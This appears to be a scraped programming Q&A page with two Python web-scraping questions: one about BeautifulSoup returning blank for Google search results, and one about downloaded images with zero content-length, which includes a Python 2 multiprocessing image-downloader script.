return BeautifulSoup(urlopen(Request(req)), 'html.parser')
except:
return"Page Not found"
But the above code is returning blank. Kindly, let me know what I might do to make the code work excellently well with BeautifulSoup without any trouble.
You can't just pass Google headers like that. The search engine is ALOT more complex than simply substituting some keywords into a GET URL.
HTML is a markup language only useful for one way rendering of human readable information. For your application, you need machine readable markup rather than trying to decipher human readable text. Google already has a very comprehensive API https://developers.google.com/custom-search/ which is easy to use, and a much better way of achieving this than using BeautifulSoup

the downloaded image's content-length is zero

I use python to download images from some website, some times the image's content-length is zero. The image can be accessed normally in web browser.
I have tried three methodes, and get the same result, so how to resolve this problem?
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 20 13:51:42 2017
"""
import urllib
import urllib2
import re
import uuid
import os
import requests
from lxml import etree
from multiprocessing import Pool
url = 'https://www.sina.com.cn/'
user_agent = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'
request = urllib2.Request(url)
request.add_header('User-Agent', user_agent)
response = urllib2.urlopen(request)
content = response.read()
tree=etree.HTML(content, parser=etree.HTMLParser(encoding='utf-8'))
node=tree.xpath("//img/#src")
dic1={}
dic2={}
localPath='E:\\pictures\\'
def generateFileName():
return str(uuid.uuid1())
def createFileWithFileName(localPathParam,fileName):
totalPath=localPathParam+'\\'+fileName
if not os.path.exists(totalPath):
file=open(totalPath,'wb')
file.close()
return totalPath
def worker(i):
path = node[i]
if not (dic1.has_key(path)):
dic1[path] = 1
index = path.rfind('/')
suffix = path[index+1:]
filename = suffix
#filename = generateFileName()+'.'+suffix
if(re.search(r'^(https?:)?\/\/', path)):
#print('save picture %s as %s' % (path,filename))
'''
#this code get the same result too
try:
urllib.urlretrieve(path, createFileWithFileName(localPath, filename))
except Exception, ex:
print(ex.message)
'''
with open(localPath + filename, 'wb') as handle:
response = requests.get(path, timeout=60)
if not response.ok:
print response
else:
print 'wrong when get ' + path
for block in response.iter_content(1024):
if not block:
break
handle.write(block)
'''
#this code get the same result too
try:
req = urllib2.Request(path)
req.add_header('User-Agent', user_agent)
picture = urllib2.urlopen(url=path, timeout=5).read()
document = open(localPath+filename,'wb')
document.write(picture)
document.close()
except Exception, ex:
print(ex.message)
'''
if __name__=='__main__':
p = Pool()
for i in range(len(node)):
p.apply_async(worker, args=(i,))
print 'Waiting for all subprocesses done...'
p.close()
p.join()
print 'All subprocesses done.'

Categories

Resources